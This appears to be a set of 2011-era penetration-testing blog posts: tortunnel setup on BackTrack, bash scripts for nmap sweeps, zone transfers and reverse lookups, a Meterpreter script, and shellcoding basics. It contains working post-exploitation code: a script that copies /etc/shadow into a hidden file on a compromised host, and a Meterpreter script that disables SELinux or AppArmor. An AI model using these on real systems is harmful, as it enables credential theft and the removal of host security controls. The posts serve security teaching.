Tortunnel on Backtrack 5r1 64bit

I ran into an issue installing tortunnel on my laptop yesterday. Tortunnel allows you to utilize the tor network for things like scanning during a pentest. I am running a fresh install of bt5r1 64bit. You first need tor and privoxy installed. Follow these Instructions in order to get both installed. Initially trying to run ./configure inside the tortunnel untared folder works. Running make seems to cause errors which complain about ssl and boost. So with a little digging I figured it out. The first thing missing is libssl-dev. This can be fixed by running:

apt-get install libssl-dev

The make script moves a little further but errors out once again complaining about missing boost files. So to fix the errors we issue these commands:

apt-get install libboost-dev 

and then

apt-get install libboost-system*

Now rerun the command

make && make install

Basic bash scripting for penetration testers

When it comes to pen testing using a linux distro, bash scripting can really help you out by speeding things up. You can quickly and easily create scripts on the fly to aid your assessment.

Example 1:

So lets say I wanted to do a quick ping sweep using nmap. I am going to use switch -oG to make a grepable file.

nmap -sP 10.10.101.0/24 -oG ipaddr.txt

Lets display the contents of ipaddr.txt.

cat ipaddr.txt 
# Nmap 5.51 scan initiated Sat Jul 30 16:07:02 2011 as: nmap -v -sP -oG ipaddr.txt 10.10.101.0/24
# Ports scanned: TCP(0;) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.101.0 ()	Status: Down
Host: 10.10.101.1 ()	Status: Down
Host: 10.10.101.2 ()	Status: Down
Host: 10.10.101.3 ()	Status: Down
Host: 10.10.101.4 ()	Status: Down
Host: 10.10.101.5 ()	Status: Down
Host: 10.10.101.6 ()	Status: Down
Host: 10.10.101.7 ()	Status: Down
Host: 10.10.101.8 ()	Status: Down
Host: 10.10.101.9 ()	Status: Down
Host: 10.10.101.10 ()	Status: Down
Host: 10.10.101.11 ()	Status: Up
Host: 10.10.101.12 ()	Status: Down
Host: 10.10.101.13 ()	Status: Up
Host: 10.10.101.14 ()	Status: Down
Host: 10.10.101.15 ()	Status: Down
Host: 10.10.101.16 ()	Status: Down
Host: 10.10.101.17 ()	Status: Down
Host: 10.10.101.18 ()	Status: Down
Host: 10.10.101.19 ()	Status: Down
Host: 10.10.101.20 ()	Status: Down
Host: 10.10.101.21 ()	Status: Down
Host: 10.10.101.22 ()	Status: Down
Host: 10.10.101.23 ()	Status: Down
Host: 10.10.101.24 ()	Status: Down
Host: 10.10.101.25 ()	Status: Down
Host: 10.10.101.26 ()	Status: Down
Host: 10.10.101.27 ()	Status: Down
Host: 10.10.101.28 ()	Status: Down
Host: 10.10.101.29 ()	Status: Down
Host: 10.10.101.30 ()	Status: Down
Host: 10.10.101.31 ()	Status: Down
Host: 10.10.101.32 ()	Status: Down
Host: 10.10.101.33 ()	Status: Down
Host: 10.10.101.34 ()	Status: Down
Host: 10.10.101.35 ()	Status: Down
Host: 10.10.101.36 ()	Status: Down
Host: 10.10.101.37 ()	Status: Down
Host: 10.10.101.38 ()	Status: Down
Host: 10.10.101.39 ()	Status: Down
Host: 10.10.101.40 ()	Status: Down
Host: 10.10.101.41 ()	Status: Down
Host: 10.10.101.42 ()	Status: Down
Host: 10.10.101.43 ()	Status: Down
Host: 10.10.101.44 ()	Status: Down
Host: 10.10.101.45 ()	Status: Down
Host: 10.10.101.46 ()	Status: Down
Host: 10.10.101.47 ()	Status: Down
Host: 10.10.101.48 ()	Status: Down
Host: 10.10.101.49 ()	Status: Down
Host: 10.10.101.50 ()	Status: Down
Host: 10.10.101.51 ()	Status: Down
Host: 10.10.101.52 ()	Status: Down
Host: 10.10.101.53 ()	Status: Down
Host: 10.10.101.54 ()	Status: Down
Host: 10.10.101.55 ()	Status: Down
Host: 10.10.101.56 ()	Status: Down
Host: 10.10.101.57 ()	Status: Down
Host: 10.10.101.58 ()	Status: Down
Host: 10.10.101.59 ()	Status: Down
Host: 10.10.101.60 ()	Status: Up
Host: 10.10.101.61 ()	Status: Down
Host: 10.10.101.62 ()	Status: Down
Host: 10.10.101.63 ()	Status: Down
Host: 10.10.101.64 ()	Status: Down
Host: 10.10.101.65 ()	Status: Down
Host: 10.10.101.66 ()	Status: Down
Host: 10.10.101.67 ()	Status: Down
Host: 10.10.101.68 ()	Status: Down
Host: 10.10.101.69 ()	Status: Down
Host: 10.10.101.70 ()	Status: Down
Host: 10.10.101.71 ()	Status: Down
Host: 10.10.101.72 ()	Status: Down
Host: 10.10.101.73 ()	Status: Down
Host: 10.10.101.74 ()	Status: Down
Host: 10.10.101.75 ()	Status: Down
Host: 10.10.101.76 ()	Status: Down
Host: 10.10.101.77 ()	Status: Down
Host: 10.10.101.78 ()	Status: Down
Host: 10.10.101.79 ()	Status: Down
Host: 10.10.101.80 ()	Status: Down
Host: 10.10.101.81 ()	Status: Down
Host: 10.10.101.82 ()	Status: Down
Host: 10.10.101.83 ()	Status: Down
Host: 10.10.101.84 ()	Status: Down
Host: 10.10.101.85 ()	Status: Down
Host: 10.10.101.86 ()	Status: Down
Host: 10.10.101.87 ()	Status: Down
Host: 10.10.101.88 ()	Status: Down
Host: 10.10.101.89 ()	Status: Down
Host: 10.10.101.90 ()	Status: Down
Host: 10.10.101.91 ()	Status: Down
Host: 10.10.101.92 ()	Status: Down
Host: 10.10.101.93 ()	Status: Down
Host: 10.10.101.94 ()	Status: Down
Host: 10.10.101.95 ()	Status: Down
Host: 10.10.101.96 ()	Status: Down
Host: 10.10.101.97 ()	Status: Down
Host: 10.10.101.98 ()	Status: Down
Host: 10.10.101.99 ()	Status: Down
Host: 10.10.101.100 ()	Status: Down
Host: 10.10.101.101 ()	Status: Up
Host: 10.10.101.102 ()	Status: Down
Host: 10.10.101.103 ()	Status: Down
Host: 10.10.101.104 ()	Status: Down
Host: 10.10.101.105 ()	Status: Down
Host: 10.10.101.106 ()	Status: Down
Host: 10.10.101.107 ()	Status: Down
Host: 10.10.101.108 ()	Status: Down
Host: 10.10.101.109 ()	Status: Down
Host: 10.10.101.110 ()	Status: Down
Host: 10.10.101.111 ()	Status: Down
Host: 10.10.101.112 ()	Status: Down
Host: 10.10.101.113 ()	Status: Down
Host: 10.10.101.114 ()	Status: Down
Host: 10.10.101.115 ()	Status: Down
Host: 10.10.101.116 ()	Status: Down
Host: 10.10.101.117 ()	Status: Down
Host: 10.10.101.118 ()	Status: Down
Host: 10.10.101.119 ()	Status: Down
Host: 10.10.101.120 ()	Status: Down
Host: 10.10.101.121 ()	Status: Down
Host: 10.10.101.122 ()	Status: Down
Host: 10.10.101.123 ()	Status: Down
Host: 10.10.101.124 ()	Status: Down
Host: 10.10.101.125 ()	Status: Down
Host: 10.10.101.126 ()	Status: Down
Host: 10.10.101.127 ()	Status: Down
Host: 10.10.101.128 ()	Status: Down
Host: 10.10.101.129 ()	Status: Down
Host: 10.10.101.130 ()	Status: Down
Host: 10.10.101.131 ()	Status: Down
Host: 10.10.101.132 ()	Status: Down
Host: 10.10.101.133 ()	Status: Down
Host: 10.10.101.134 ()	Status: Down
Host: 10.10.101.135 ()	Status: Down
Host: 10.10.101.136 ()	Status: Down
Host: 10.10.101.137 ()	Status: Down
Host: 10.10.101.138 ()	Status: Down
Host: 10.10.101.139 ()	Status: Down
Host: 10.10.101.140 ()	Status: Down
Host: 10.10.101.141 ()	Status: Down
Host: 10.10.101.142 ()	Status: Down
Host: 10.10.101.143 ()	Status: Down
Host: 10.10.101.144 ()	Status: Down
Host: 10.10.101.145 ()	Status: Down
Host: 10.10.101.146 ()	Status: Down
Host: 10.10.101.147 ()	Status: Down
Host: 10.10.101.148 ()	Status: Down
Host: 10.10.101.149 ()	Status: Down
Host: 10.10.101.150 ()	Status: Down
Host: 10.10.101.151 ()	Status: Down
Host: 10.10.101.152 ()	Status: Down
Host: 10.10.101.153 ()	Status: Down
Host: 10.10.101.154 ()	Status: Down
Host: 10.10.101.155 ()	Status: Down
Host: 10.10.101.156 ()	Status: Down
Host: 10.10.101.157 ()	Status: Down
Host: 10.10.101.158 ()	Status: Down
Host: 10.10.101.159 ()	Status: Down
Host: 10.10.101.160 ()	Status: Down
Host: 10.10.101.161 ()	Status: Down
Host: 10.10.101.162 ()	Status: Down
Host: 10.10.101.163 ()	Status: Down
Host: 10.10.101.164 ()	Status: Down
Host: 10.10.101.165 ()	Status: Down
Host: 10.10.101.166 ()	Status: Down
Host: 10.10.101.167 ()	Status: Down
Host: 10.10.101.168 ()	Status: Down
Host: 10.10.101.169 ()	Status: Down
Host: 10.10.101.170 ()	Status: Down
Host: 10.10.101.171 ()	Status: Down
Host: 10.10.101.172 ()	Status: Down
Host: 10.10.101.173 ()	Status: Down
Host: 10.10.101.174 ()	Status: Down
Host: 10.10.101.175 ()	Status: Down
Host: 10.10.101.176 ()	Status: Down
Host: 10.10.101.177 ()	Status: Down
Host: 10.10.101.178 ()	Status: Down
Host: 10.10.101.179 ()	Status: Down
Host: 10.10.101.180 ()	Status: Down
Host: 10.10.101.181 ()	Status: Down
Host: 10.10.101.182 ()	Status: Down
Host: 10.10.101.183 ()	Status: Down
Host: 10.10.101.184 ()	Status: Down
Host: 10.10.101.185 ()	Status: Down
Host: 10.10.101.186 ()	Status: Down
Host: 10.10.101.187 ()	Status: Down
Host: 10.10.101.188 ()	Status: Down
Host: 10.10.101.189 ()	Status: Down
Host: 10.10.101.190 ()	Status: Down
Host: 10.10.101.191 ()	Status: Down
Host: 10.10.101.192 ()	Status: Down
Host: 10.10.101.193 ()	Status: Down
Host: 10.10.101.194 ()	Status: Down
Host: 10.10.101.195 ()	Status: Down
Host: 10.10.101.196 ()	Status: Down
Host: 10.10.101.197 ()	Status: Down
Host: 10.10.101.198 ()	Status: Down
Host: 10.10.101.199 ()	Status: Down
Host: 10.10.101.200 ()	Status: Down
Host: 10.10.101.201 ()	Status: Down
Host: 10.10.101.202 ()	Status: Down
Host: 10.10.101.203 ()	Status: Down
Host: 10.10.101.204 ()	Status: Down
Host: 10.10.101.205 ()	Status: Down
Host: 10.10.101.206 ()	Status: Down
Host: 10.10.101.207 ()	Status: Down
Host: 10.10.101.208 ()	Status: Down
Host: 10.10.101.209 ()	Status: Down
Host: 10.10.101.210 ()	Status: Down
Host: 10.10.101.211 ()	Status: Down
Host: 10.10.101.212 ()	Status: Down
Host: 10.10.101.213 ()	Status: Down
Host: 10.10.101.214 ()	Status: Down
Host: 10.10.101.215 ()	Status: Down
Host: 10.10.101.216 ()	Status: Down
Host: 10.10.101.217 ()	Status: Down
Host: 10.10.101.218 ()	Status: Down
Host: 10.10.101.219 ()	Status: Down
Host: 10.10.101.220 ()	Status: Down
Host: 10.10.101.221 ()	Status: Down
Host: 10.10.101.222 ()	Status: Down
Host: 10.10.101.223 ()	Status: Down
Host: 10.10.101.224 ()	Status: Down
Host: 10.10.101.225 ()	Status: Down
Host: 10.10.101.226 ()	Status: Down
Host: 10.10.101.227 ()	Status: Down
Host: 10.10.101.228 ()	Status: Down
Host: 10.10.101.229 ()	Status: Down
Host: 10.10.101.230 ()	Status: Down
Host: 10.10.101.231 ()	Status: Down
Host: 10.10.101.232 ()	Status: Down
Host: 10.10.101.233 ()	Status: Down
Host: 10.10.101.234 ()	Status: Down
Host: 10.10.101.235 ()	Status: Down
Host: 10.10.101.236 ()	Status: Down
Host: 10.10.101.237 ()	Status: Down
Host: 10.10.101.238 ()	Status: Down
Host: 10.10.101.239 ()	Status: Down
Host: 10.10.101.240 ()	Status: Down
Host: 10.10.101.241 ()	Status: Down
Host: 10.10.101.242 ()	Status: Down
Host: 10.10.101.243 ()	Status: Down
Host: 10.10.101.244 ()	Status: Down
Host: 10.10.101.245 ()	Status: Down
Host: 10.10.101.246 ()	Status: Down
Host: 10.10.101.247 ()	Status: Down
Host: 10.10.101.248 ()	Status: Down
Host: 10.10.101.249 ()	Status: Down
Host: 10.10.101.250 ()	Status: Down
Host: 10.10.101.251 ()	Status: Down
Host: 10.10.101.252 ()	Status: Down
Host: 10.10.101.253 ()	Status: Down
Host: 10.10.101.254 ()	Status: Down
Host: 10.10.101.255 ()	Status: Down
# Nmap done at Sat Jul 30 16:07:05 2011 -- 256 IP addresses (4 hosts up) scanned in 3.16 seconds

We are only concerned about the hosts that are alive, so how do we quickly get a listing of just hosts that are up?
Like this:

cat ipaddr.txt | grep Up | cut -d" " -f2
10.10.101.11
10.10.101.13
10.10.101.60
10.10.101.101

This command cats the contents of ipaddr.txt, uses grep to just show matches for the keyword Up, uses cut with the delimiter of a space, and just displays field 2. The results are a nice clean listing of IP addresses.

Example 2:

So lets say you got a listing of domains you want to attempt zone transfers on. You don’t want to slowly try each one individually. Most pentests are limited in time so you want to get as much as possible done in a short period.
So lets whip a script up that does this based on your list of domains.
The domains listing format will be a text file with:

gooble.com
testcompany.net
fakecompany.org

Save this file as domains.txt and get scripting on a tool that attempts zone transfers on your list.

#!/bin/bash

for i in $(cat domains.txt) 
  do host -l $i 
done

Save the script as zonetransfer.sh and run:

chmod +x zontransfer.sh

This will make the file executable. Also make sure domains.txt is in the same folder as the script.

Example 3:

So lets say you have a bunch of failed zone transfers because the company you are doing a pentest for blocks zone transfers from anyone but their DNS servers. If you happen to have a particular subnet in your scope, you can attempt do reverse lookups of each IP to gather dns PTR records. If you did each IP individually it would take a decent amount of time. Lets have bash do the work for us.

#!/bin/bash

i="1" 

echo "Please enter first 3 octets. e.g 192.168.1" 
read subnet
        while [ $i -le 254 ]; do 
        host -l "$subnet"."$i"
        i=$(( $i + 1))
        done

This bash script will iterate IP 1 through 254 doing reverse lookups of each IP address.

Example 4:

So in this example we will assume you have root access to a compromised linux server. You want to gather information from the server to place in your pentest report and to assist in possibly compromising additional servers.

#!/bin/bash

echo "#############################" >> .gathered_info
echo "#Linux info gather script" >> .gathered_info
echo "#############################" >> .gathered_info
echo " " >> .gathered_info
echo "[+]Running whoami..."
echo "*********WHOAMI**************" >> .gathered_info
whoami >> .gathered_info
echo "[+]Gathering hosts..."
echo "*********HOSTS FILE**********" >> .gathered_info
echo " " >> .gathered_info
cat /etc/hosts >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering network info..." 
echo "*********IFCONFIG************" >> .gathered_info
echo " " >> .gathered_info
/sbin/ifconfig >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering arp info..."
echo "*********ARP****************" >> .gathered_info
echo " " >> .gathered_info
/usr/sbin/arp -a >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering IPtables..."
echo "********IPtables************" >> .gathered_info
echo " " >> .gathered_info
/sbin/iptables -L >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering Route info..."
echo "********Route info**********" >> .gathered_info
echo " " >> .gathered_info
/sbin/route >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering Shadow file..."
echo "********Shadow file*********" >> .gathered_info
echo " " >> .gathered_info
/bin/cat /etc/shadow >> .gathered_info
echo " " >> .gathered_info
echo "****************************" >> .gathered_info

The end result is all gathered info placed neatly in a hidden text file. It certainly beats running each command manually to gather information.

I hope these examples show you the power and flexibility of bash whether used in penetration testing or even everyday system administration.

Quick Meterpreter script

So beings I wanted to get back into ruby and also like metasploit, I decided to write a quick meterpreter script to assist in shutting down the mandatory access control running on your flavor of linux. It’s real quick and dirty to get the job done.

#$Id: mac_off.rb 2011-06-19 3vi1john$
#Meterpreter script for linux the switches selinux to permissive mode or turns off apparmor.
#$Revision: 1$
#Provided by John Babio at <3vi1john [at] gmx.com>



@@exec_opts = Rex::Parser::Arguments.new(
        "-h" => [ false, "Help menu." ]
)
def usage
        print_line("This script quickly sets selinux to permissive mode or turns off apparmor depending on the compromised linux distro")
        print_line("USAGE: Just run the script.")
        print_line(@@exec_opts.usage)
        raise Rex::Script::Completed
end

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
        when "-h"
                usage
        end
}

kernel = client.sys.config.sysinfo['OS']
print_status("Checking Linux version...")
if kernel =~/el3|el4|el5|el6|fc1|fc2|fc3|fc4|fc5|fc6|fc7|fc8|fc9|fc10|fc11|fc12|fc13|fc14|fc15/
        print_status("It Looks like a version of Redhat or Fedora.")
	print_status("Attempting to move SELinux from enforcing to permissive...")
        client.sys.process.execute("//usr//sbin//setenforce", "permissive")
	print_status("Successfully moved SELinux to permissive mode.")
elsif kernel =~/Ubuntu|ubuntu|Suse|suse|sles|Sles/
        print_status("It Looks like Ubuntu or Suse.")
	print_status("Attempting to Kill Apparmor...")
        client.sys.process.execute("//etc//init.d//apparmor", "teardown")
	print_status("Successfully turned off apparmor.")
else
        print_status("The linux version is not found in the list. No MAC to kill.")
end

Shellcoding on linux

Shellcoding on linux is relatively easier to start than shellcoding on windows. There are a few things to know before getting started.

1. Whats the purpose of the shellcode? Shellcode is usually a small program performing a simple task. e.g. Add an administrative user to compromised system.

2. Syscall number or numbers you need to use. The number is placed in eax. Syscall number list

3. Which other registers are required? e.g. for a simple exit shellcode ebx is required to be a 0 and eax requires the syscall 1.

4. Style of assembly programming. At&t or intel e.g. At&t uses instruction source, destination and intel uses instruction destination, source.

5. Tools: Nasm, ld, and objdump. e.g. Compiling file shellcode.asm using nasm would be “nasm -f elf shellcode.asm”.

linking the shellcode.o file created by nasm would be “ld shellcode.o -o shellcode”.

Dumping opcodes for use in your shellcode would be “objdump -d shellcode”. The middle section of opcodes would be placed together in a “\x00\x00” format.

6. Eliminate null bytes from your opcodes. Null bytes are two 0s and prematurely terminate the shellcode. e.g. (intel syntax) instead of mov eax,1 use mov al,1(use the 8bit part of eax) or push byte 1 and pop eax. Instead of mov ebx,0 use xor ebx,ebx.